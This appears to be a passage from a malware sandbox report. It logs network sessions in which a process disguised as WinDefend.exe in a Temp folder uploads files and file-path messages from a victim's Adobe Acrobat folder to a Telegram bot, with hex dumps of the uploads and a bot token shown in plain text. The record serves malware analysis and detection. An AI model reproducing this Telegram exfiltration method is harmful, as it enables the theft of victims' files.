25 33 41 2b 32 35 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+core_icons_highcontrast_retina.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Chi_contrast%5Ccore_icons_highcontrast_retina.png%0ASize%3A+25+KB
2024-05-23 13:35:55 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:56 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:55 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
232	192.168.2.5	61284	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:55 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="7f7063b9-486e-4359-8822-8a223dc91761" Host: api.telegram.org Content-Length: 11429 Expect: 100-continue
2024-05-23 13:35:55 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:55 UTC	40	OUT	Data Raw: 2d 2d 37 66 37 30 36 33 62 39 2d 34 38 36 65 2d 34 33 35 39 2d 38 38 32 32 2d 38 61 32 32 33 64 63 39 31 37 36 31 0d 0a Data Ascii: --7f7063b9-486e-4359-8822-8a223dc91761
2024-05-23 13:35:55 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 61 62 32 37 62 33 35 35 35 30 32 62 32 33 65 64 63 35 37 64 63 63 34 36 35 36 33 35 63 33 66 35 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 61 62 32 37 62 33 35 35 35 30 32 62 32 33 65 64 63 35 37 64 63 63 34 36 35 36 33 35 63 33 66 35 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=ab27b355502b23edc57dcc465635c3f5.png; filename*=utf-8''ab27b355502b23edc57dcc465635c3f5.png
2024-05-23 13:35:55 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 01 f4 08 02 00 00 00 44 b4 48 dd 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 20 00 49 44 41 54 78 9c ed dd 7f 6c 54 e7 9d ef f1 e7 cc 38 7b 85 f1 b4 95 30 2b d9 16 3f fe c1 e3 f8 6a b5 8a 7f 50 ed 0d d2 98 38 41 4a 20 04 f6 72 25 20 5a d2 ab 40 88 4b 93 55 89 73 43 5a c9 c4 96 9a 10 85 50 a9 29 6b 58 83 56 d0 06 90 8a 8a 13 3b 89 94 60 ec a9 c8 5d 15 ff 88 ae ae e4 78 8c 2a 19 23 db d2 e2 ac 6e 33 c6 48 0d 3e e7 fe 71 52 c7 c0 cc f1 39 33 67 9e e7 9c c7 ef d7 3f ab c6 66 e6 09 59 7d e6 99 ef f9 3e df c7 b0 fe 34 2c 00 00 7a 89 a8 5e 00 00 c0 7f 84 3b 00 68 88 70 07 00 0d 11 ee 00 a0 21 c2 1d 00 34 44 b8 03 80 86 08 77 00 d0 10 e1 0e 00 1a 22 dc 01 40 43 84 3b 00 68 Data Ascii: PNGIHDRDHpHYs~ IDATxlT8{0+?jP8AJ r% Z@KUsCZP)kXV;`]x*#n3H>qR93g?fY}>4,z^;hp!4Dw"@C;h
2024-05-23 13:35:55 UTC	4096	OUT	Data Raw: 5d 06 6a 32 f2 99 5d 97 a2 f1 d7 7d 79 9d fc 5f a4 40 8c ca b8 11 7f 58 94 57 18 65 e5 0e d7 6c 99 f6 a3 e0 c9 09 6b 72 42 4c 4e 50 62 5a 22 08 f7 82 a3 26 a3 84 f9 61 67 b4 d9 87 70 0f e0 a1 e2 48 c3 63 46 43 63 64 e3 e3 22 16 73 f3 fb d1 7b ef ce fd a6 a6 ba 20 cb 42 c0 10 ee 05 47 4d 46 8d 99 b4 d9 db 93 e7 e5 ae c1 3a 54 5c 12 8b 3c bb 27 ba 7b 8f cb 4c c7 12 47 cd bd c0 d2 69 25 97 ea 41 f8 f1 b1 6a 0d 06 e5 d6 59 a3 b6 be e8 c2 ef a3 fb 0f 90 ec 70 89 70 2f 2c 69 13 c6 f1 a0 fc 1f 75 04 e4 4a f1 c8 fe 03 45 1d 67 1c aa ea c0 83 08 f7 c2 a2 26 a3 52 de 17 ab 9a 03 ea 4f a5 46 f6 1f 88 ee 3f a0 7a 15 08 1f c2 bd 90 d2 69 b3 ef 8a ea 45 2c 69 56 3e bd 2e e9 b4 f2 27 e1 91 86 c7 48 76 e4 86 70 2f 20 6a 32 ca e5 73 7d 87 95 fa d2 df c5 e4 20 e2 47 c3 0f Data Ascii: ]j2]}y_@XWelkrBLNPbZ"&agpHcFCcd"s{ BGMF:T\<'{LGi%AjYpp/,iuJEg&ROF?ziE,iV>.'Hvp/ j2s} G
2024-05-23 13:35:55 UTC	2861	OUT	Data Raw: 16 15 5b 5e 9c ed 83 61 66 f6 ce e0 f0 88 cb d7 a9 5c bb fa 44 cb a1 f9 ce 4b af 46 6f f8 53 99 a1 5b 06 80 3f 26 b3 1f b2 df b7 e3 99 9a 2c a5 92 f2 95 a5 5e 67 31 66 cb d9 75 6b 56 e5 d8 c7 e0 7d 00 00 0a d3 49 44 41 54 39 62 77 4b 62 43 c7 c5 0f 32 fe 68 74 6c dc fd 8b db f9 3e 75 6b 3a db df 49 77 f2 6a b6 31 38 9e de c8 c1 52 09 77 6b b0 ff 9b 9a 6a d5 ab 00 c2 e4 a1 a1 61 bf 5e 2a 9f 0d f5 83 a6 fe 23 73 62 e6 3f 5c b7 6c 65 69 4d 75 3c e3 fc de 1c 36 d4 65 d9 3f b7 6a ab ab b2 9d ed 9a 99 a5 2c 03 60 49 ca 56 fc f1 e5 66 a5 6c bb 66 df 87 7f 15 e8 7a 90 79 84 3b 00 4d 54 ae f1 21 dc 4b 8a 0b 9b b9 d2 10 ee 00 34 e1 cb 5e 58 c2 c5 aa 72 10 ee 00 32 b3 06 fb 55 2f c1 1b 5f 9a 08 7d 3c 46 a4 96 b6 0f 54 8d ba f5 3e 3e 0e 02 10 7c a3 37 7c e8 33 f1 eb Data Ascii: [^af\DKFoS[?&,^g1fukV}IDAT9bwKbC2htl>uk:Iwj18Rwkja^*#sb?\leiMu<6e?j,`IVflfzy;MT!K4^Xr2U/_}<FT>>\|7\|3
2024-05-23 13:35:55 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 37 66 37 30 36 33 62 39 2d 34 38 36 65 2d 34 33 35 39 2d 38 38 32 32 2d 38 61 32 32 33 64 63 39 31 37 36 31 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --7f7063b9-486e-4359-8822-8a223dc91761Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:55 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:55 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 37 66 37 30 36 33 62 39 2d 34 38 36 65 2d 34 33 35 39 2d 38 38 32 32 2d 38 61 32 32 33 64 63 39 31 37 36 31 2d 2d 0d 0a Data Ascii: --7f7063b9-486e-4359-8822-8a223dc91761--
2024-05-23 13:35:56 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:56 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
233	192.168.2.5	61285	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:55 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="01cdfa1e-89f4-4d27-a799-97624c5d11c9" Host: api.telegram.org Content-Length: 1464 Expect: 100-continue
2024-05-23 13:35:56 UTC	40	OUT	Data Raw: 2d 2d 30 31 63 64 66 61 31 65 2d 38 39 66 34 2d 34 64 32 37 2d 61 37 39 39 2d 39 37 36 32 34 63 35 64 31 31 63 39 0d 0a Data Ascii: --01cdfa1e-89f4-4d27-a799-97624c5d11c9
2024-05-23 13:35:56 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 34 38 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 34 38 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=48.png; filename*=utf-8''48.png
2024-05-23 13:35:56 UTC	1148	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 04 43 49 44 41 54 68 81 ed 9a bb 8b 24 55 18 c5 7f e7 56 75 f7 ce ce 2c dd bb ab 8b e8 7f 60 ac 20 26 8a 60 22 18 88 30 7f 80 91 86 26 e2 2b 98 60 17 44 d4 4c 0c c4 58 98 0d 85 05 31 50 13 03 cd 8d 54 0c 4c 0c 66 ed 1d 9d e9 99 e9 aa 7b 0c 6e f5 6c 8f db af aa ee 9e 61 c1 03 97 ea c7 ad ef bb a7 be e7 ad 2a 58 00 de 25 5b 64 de a2 b0 d1 aa 64 2d 2c c8 77 e8 b0 c1 46 bf 9f be f7 6a 2a ea 03 bd 1e 50 60 bd c8 3d 1b 49 b8 a6 98 07 90 cf 9b e0 5d da c5 f5 70 cb 2d bd 1a 4f dc bd 72 45 32 a8 a8 a9 68 d3 a6 8c 2a 43 cb e1 ef cf e3 c7 12 b7 bc 4b a6 6d ca 86 6b 07 66 58 c0 3b 04 ed 10 87 df 84 4f f2 47 c3 9b be 9b 2e 96 d4 cc fa b6 41 c2 a5 09 7f 96 dc db e7 Data Ascii: PNGIHDR00WCIDATh$UVu,` &`"0&+`DLX1PTLf{nlaX%[dd-,wFjP`=I]p-OrE2h*CKmkfX;OG.A
2024-05-23 13:35:56 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 30 31 63 64 66 61 31 65 2d 38 39 66 34 2d 34 64 32 37 2d 61 37 39 39 2d 39 37 36 32 34 63 35 64 31 31 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --01cdfa1e-89f4-4d27-a799-97624c5d11c9Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:56 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:56 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 30 31 63 64 66 61 31 65 2d 38 39 66 34 2d 34 64 32 37 2d 61 37 39 39 2d 39 37 36 32 34 63 35 64 31 31 63 39 2d 2d 0d 0a Data Ascii: --01cdfa1e-89f4-4d27-a799-97624c5d11c9--
2024-05-23 13:35:56 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:56 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:56 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
234	192.168.2.5	61286	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:56 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="dba1e0a7-3a5a-42f1-ae51-01bbdb95286f" Host: api.telegram.org Content-Length: 26930 Expect: 100-continue
2024-05-23 13:35:57 UTC	40	OUT	Data Raw: 2d 2d 64 62 61 31 65 30 61 37 2d 33 61 35 61 2d 34 32 66 31 2d 61 65 35 31 2d 30 31 62 62 64 62 39 35 32 38 36 66 0d 0a Data Ascii: --dba1e0a7-3a5a-42f1-ae51-01bbdb95286f
2024-05-23 13:35:57 UTC	147	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 63 6f 72 65 5f 69 63 6f 6e 73 5f 68 69 67 68 63 6f 6e 74 72 61 73 74 5f 72 65 74 69 6e 61 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 63 6f 72 65 5f 69 63 6f 6e 73 5f 68 69 67 68 63 6f 6e 74 72 61 73 74 5f 72 65 74 69 6e 61 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=core_icons_highcontrast_retina.png; filename*=utf-8''core_icons_highcontrast_retina.png
2024-05-23 13:35:57 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 78 00 00 02 58 08 03 00 00 00 ef de 7e bd 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 02 fd 50 4c 54 45 ff ff ff ff ff ff 91 bb e4 24 be ff 0a bd ff 7d 7d 7d 79 79 79 75 75 75 ff 4a 40 20 74 c7 66 66 66 19 73 cb 0d 71 ce 45 45 45 00 00 00 ff ff ff c6 c6 c6 ba ba ba 8d b8 e3 24 be ff 7d 7d 7d 79 79 79 75 75 75 ff 4a 40 20 74 c7 66 66 66 19 73 cb 0d 71 ce 45 45 45 00 00 00 ff ff ff ba ba ba 89 b6 e2 24 be ff 0a bd ff 7d 7d 7d 79 79 79 75 75 75 ff 4a 40 20 74 c7 66 66 66 19 73 cb 0d 71 ce 45 45 45 00 00 00 ff ff ff ba ba ba 7d 7d 7d 79 79 79 75 75 75 ff 4a 40 20 74 c7 66 66 66 19 73 cb 0d 71 ce 45 45 45 00 00 00 ff ff ff aa aa aa 24 be ff 7d 7d 7d 79 79 79 75 75 75 ff 4a 40 20 74 c7 19 73 cb 66 Data Ascii: PNGIHDRxX~sBITOPLTE$}}}yyyuuuJ@ tfffsqEEE$}}}yyyuuuJ@ tfffsqEEE$}}}yyyuuuJ@ tfffsqEEE}}}yyyuuuJ@ tfffsqEEE$}}}yyyuuuJ@ tsf
2024-05-23 13:35:57 UTC	4096	OUT	Data Raw: a0 81 13 53 4e f6 44 02 e5 64 64 31 12 2c 27 2b 0c 78 79 21 59 6d ed a2 f7 fe b3 13 e2 ce 3b ef 2c fc ab 57 60 16 14 af e2 21 ab f5 4e 0f ff 68 90 27 47 d9 f5 f4 4e 7e ed b9 d9 bf 47 23 cc d6 7d ea 76 0d 6c 66 8d 78 6a 4d e0 f5 9e 50 77 a1 98 db 78 e2 95 cc 2b dd 08 48 f7 f8 81 2f f1 6e 85 77 b1 64 d8 07 af 1e 13 cb d4 0e a3 2f 68 e0 44 2f a0 b8 3f 81 05 14 74 31 d8 02 8a e7 23 fe 92 5f 90 2e a0 a8 e5 37 5c ab ad 5d 7e f9 6d 05 df 5e 5f f8 e7 b6 73 de 7e e2 31 c7 1d 77 e2 f2 ab 72 64 e2 dd a0 4c 54 ae d6 3c 3d b6 fb 4a 25 76 f2 71 22 13 af a8 ef 8d 7a dc 8c 59 30 a2 32 ec 3c ee e3 ad 1a c7 8d 64 9d 4f bc 94 77 ed 4c 02 49 bc ae 79 5b a4 7d ba c7 0f 5e 3d 75 87 bd 8b 26 39 7e 84 79 59 1d 03 f5 4a 61 97 bd e3 ff a1 d6 d5 7f d1 2d e7 75 63 04 97 0c 13 c6 60 Data Ascii: SNDdd1,'+xy!Ym;,W`!Nh'GN~G#}vlfxjMPwx+H/nwd/hD/?t1#_.7\]~m^_s~1wrdLT<=J%vq"zY02<dOwLIy[}^=u&9~yYJa-uc`
2024-05-23 13:35:57 UTC	4096	OUT	Data Raw: e2 65 45 bc c7 a9 1e 44 63 63 77 02 4d cc a8 71 f1 8a 79 36 aa 76 bc 02 b3 0b 28 b8 9c 0c 37 6a 90 30 25 5e c9 bc ae 78 45 c1 1a 59 a9 f0 1c 98 5c 7b 8c 62 72 ed 8c 80 77 93 5c 40 31 e4 db 5e 3e 53 fe 59 27 e6 5d 3e e6 65 ff ec 39 c2 db d1 61 4a bc db f9 40 77 f3 b2 85 0b 57 8b fb 54 6c 2f 3f 8c 47 c6 1b e5 f2 01 6f 3a 2a c9 38 b2 78 d9 cf aa 7c ee bb 35 db e3 d8 b8 25 63 61 f1 2e a3 7a 27 2c f3 4b 86 4f 7c 29 49 f3 1a 13 af b7 04 cf 11 ef 31 f7 bc 44 da 63 b8 52 ca c9 7c 4b 86 c5 40 37 75 4b 86 fd 23 de 9b d9 4b 74 6e 41 ba 7f e2 ba 92 0a 19 4c 89 97 8f 77 9d 15 52 e2 56 c4 24 63 5e af d9 1a ab 97 d3 5b fe 91 2c 41 f1 2a 1e f2 7e dd be 64 36 ee 22 09 b1 6a 82 8b b7 cf d9 42 76 5f a6 84 9a e4 24 65 5e 73 e2 75 cd 6b 8b 97 2f 8d a3 ec ed 9e dc 02 0a 91 57 Data Ascii: eEDccwMqy6v(7j0%^xEY\{brw\@1^>SY']>e9aJ@wWTl/?Go:8x\|5%ca.z',KO\|)I1DcR\|K@7uK#KtnALwRV$c^[,A~d6"jBv_$e^suk/W
2024-05-23 13:35:57 UTC	4096	OUT	Data Raw: 13 59 97 1c 23 de 50 8f 61 cd 08 f6 a4 57 bb fd 65 62 a8 9c cc 19 59 7b f9 6a 92 71 75 22 4b 86 87 4a 68 bc 51 4a 3f 87 d2 59 9d 40 23 f4 fd 0f e5 7e a1 f0 6e 1a c5 6b 9b 97 fa a8 21 aa 48 bd eb 13 af 8b e2 e8 44 e2 0d f4 3c a3 8b 91 50 ff 9a 98 4e 3c ee 90 87 a0 49 4e b4 78 85 79 f5 c7 bc ee f1 ec 05 14 62 ab a9 05 14 66 26 d7 12 69 92 53 82 b8 d9 a8 98 60 fd 84 cb ea 04 6e fd b3 ff 21 95 77 53 29 de 54 37 42 57 f4 0a 0b 3f 4e 33 86 e5 2f 6b a0 8d 61 95 dc b1 51 af 81 5f 22 bd 27 e3 c4 2b 7a 7b 6b 7f cc fc 11 8c 2f 19 36 52 4e 96 48 5b c8 86 e2 56 6d cf 91 ae 6d 11 e6 4d f2 66 97 29 17 2f bb f5 0f c1 22 de 62 b4 9a b8 f5 8f a2 57 58 f8 71 9a 31 9c 2c 89 8d 7a 49 45 b9 31 ac 92 7b 94 eb 5d 13 36 f8 83 44 75 5b d7 bc f0 8c 13 2f cd 79 9e b0 78 8d 2c a0 48 Data Ascii: Y#PaWebY{jqu"KJhQJ?Y@#~nk!HD<PN<INxybf&iS`n!wS)T7BW?N3/kaQ_"'+z{k/6RNH[VmmMf)/"bWXq1,zIE1{]6Du[/yx,H
2024-05-23 13:35:57 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:57 UTC	4096	OUT	Data Raw: 7c e8 50 66 0d d7 68 9f 31 91 e2 65 a2 91 0b 51 b9 2e cb cb f3 06 a5 da 16 f6 2e 95 78 dd d5 69 92 78 c5 ea 61 bd 76 bc 96 97 bc 15 57 e3 35 ee c0 3d 7c 71 be 44 a3 d6 a4 26 7c 65 d1 d6 d1 11 88 b1 66 8a b6 45 84 01 f1 4a 0b 28 6c f3 8e 48 05 bc 36 74 0b 28 6c f3 de 2b 15 f0 5a de 1e 2c a0 70 60 b3 9b 3b 92 f2 2e b9 78 93 5a 96 ec 3b 1f ea 15 7a d4 1c c4 39 31 94 e2 75 fb 01 74 d8 86 6c 2b 5b 5c 21 a9 b6 85 bc 4b 25 5e 6f 89 17 7f f6 5c bc 9d 22 92 56 3b 5e 4b 6e 0c 39 d6 df e3 75 cc 21 6e 0a c9 5f 88 62 99 e8 7e 9a 17 cb c5 80 78 e5 25 c3 ee 1d de 83 e7 3a e1 92 61 f7 0e ef c1 be e8 58 32 2c c1 7b 24 ef db 2a bc ab f1 ca 97 08 b5 78 4b f7 ae 5e 35 45 d1 f3 c1 a0 78 9b dc 41 95 1b a3 ec 72 ac b0 54 d7 84 2e a8 89 c4 eb 35 e4 e5 bd 20 6d f1 f2 3f 44 ab 1d Data Ascii: \|Pfh1eQ..xixavW5=\|qD&\|efEJ(lH6t(l+Z,p`;.xZ;z91utl+[\!K%^o\"V;^Kn9u!n_b~x%:aX2,{$*xK^5ExArT.5 m?D
2024-05-23 13:35:57 UTC	4096	OUT	Data Raw: 26 60 5e 53 bd ee 15 d3 66 ab ae 58 1b ec cc 4b 2d 5e eb b4 9e 73 83 9d 79 89 c4 2b 77 69 70 7f 4e c1 90 b7 7a dd e6 cd 9b 6d a3 4a 19 04 a7 c0 ac b0 73 9d bb 75 99 3b 7c 28 17 57 bc 27 04 52 bc 8c a3 09 8b 1a d4 77 fa f9 64 3a de 93 f0 02 0a a5 78 0d 2c a0 68 21 ee b8 5d 99 e2 15 75 ef 86 cb 1a 5a cc 94 35 84 26 d7 94 10 4f ae 29 21 9a 5c 73 bb 34 7c 48 e4 12 53 33 e4 65 6c b0 3f 95 dd c1 0d 81 5e a3 2b d9 b6 95 c1 ff f7 0c f0 8d 78 03 9a 3d 7a 57 70 4b f9 bc fe 45 65 2b 32 e9 ee 97 73 9b d0 92 61 95 78 4d 2c 19 6e a7 35 79 85 8a d7 2e 28 33 bb 80 a2 d5 c8 02 8a 50 39 99 0a ea 72 32 15 44 e5 64 5e 97 86 4f 8a 81 55 6a 86 bc 8c 85 ce e2 9f ed 7c 34 bb d0 29 69 18 0d 7e a9 af d6 5c cc e6 e5 78 2f bc f1 4c ff ae f9 bb 42 2a 2e 9f 88 bb b9 bf 42 35 e5 36 17 Data Ascii: &`^SfXK-^sy+wipNzmJsu;\|(W'Rwd:x,h!]uZ5&O)!\s4\|HS3el?^+x=zWpKEe+2saxM,n5y.(3P9r2Dd^OUj\|4)i~\x/LB*.B56
2024-05-23 13:35:57 UTC	1982	OUT	Data Raw: 84 53 0d 5b 14 25 0c 84 a9 86 2b c5 cc 5a ed 1d b7 92 57 36 a8 a4 e8 95 78 a5 47 bc 51 c5 64 74 e6 15 4a 7c ed 0f fc 62 7c e6 99 1f bc d6 d9 4b 17 85 f3 79 2f 0e f5 b8 5a 90 31 6c de 80 77 13 31 af 11 ef ca 5d 1a dc 9f 53 35 e4 75 c5 db 10 48 f1 32 ea 48 8a 1a 38 4d 51 e2 25 b9 b2 0a 4f ae a9 46 b7 74 93 6b b5 d3 76 2b de 93 ee 23 5f bd 56 29 e2 8d ae e0 d5 3f b6 80 2b f1 9d 3f 79 26 28 de 67 7e e2 74 6d 20 8b c2 7e b0 47 d6 f6 56 e2 71 b5 0d 5f ce 69 ae ac 61 24 e0 5d db bc 06 56 95 b9 e6 35 e2 5d af 4b 43 41 b6 ef 4d 65 c7 06 df 88 37 70 2e d6 0d c5 cc c0 cc 94 1e b5 77 69 7a 81 84 cb c9 b6 f8 96 b2 71 08 cb c9 2e 71 3b 42 be 83 7c dd f0 ac a5 1a 7c 7b f5 63 30 c7 fe 85 0f 3e de 65 e6 8d ee 9d 33 23 98 f4 fe d6 59 c5 c0 13 0d ee 6f 1f a0 17 af 7f 64 4d Data Ascii: S[%+ZW6xGQdtJ\|b\|Ky/Z1lw1]S5uH2H8MQ%OFtkv+#_V)?+?y&(g~tm ~GVq_ia$]V5]KCAMe7p.wizq.q;B\|\|{c0>e3#YodM
2024-05-23 13:35:57 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 64 62 61 31 65 30 61 37 2d 33 61 35 61 2d 34 32 66 31 2d 61 65 35 31 2d 30 31 62 62 64 62 39 35 32 38 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --dba1e0a7-3a5a-42f1-ae51-01bbdb95286fContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:57 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:57 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
235	192.168.2.5	61287	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:56 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 257 Expect: 100-continue
2024-05-23 13:35:57 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:57 UTC	257	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 62 39 36 31 63 64 65 32 37 36 63 39 30 30 31 35 66 31 64 62 35 31 39 37 35 61 34 37 30 37 34 37 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 62 39 36 31 63 64 65 32 37 36 63 39 30 30 31 35 66 31 64 62 35 31 39 37 35 61 34 37 30 37 34 37 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 32 30 2b Data Ascii: chat_id=1655240967&text=File%3A+b961cde276c90015f1db51975a470747.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5Cb961cde276c90015f1db51975a470747.png%0ASize%3A+20+
2024-05-23 13:35:57 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:57 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
236	192.168.2.5	61288	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:57 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
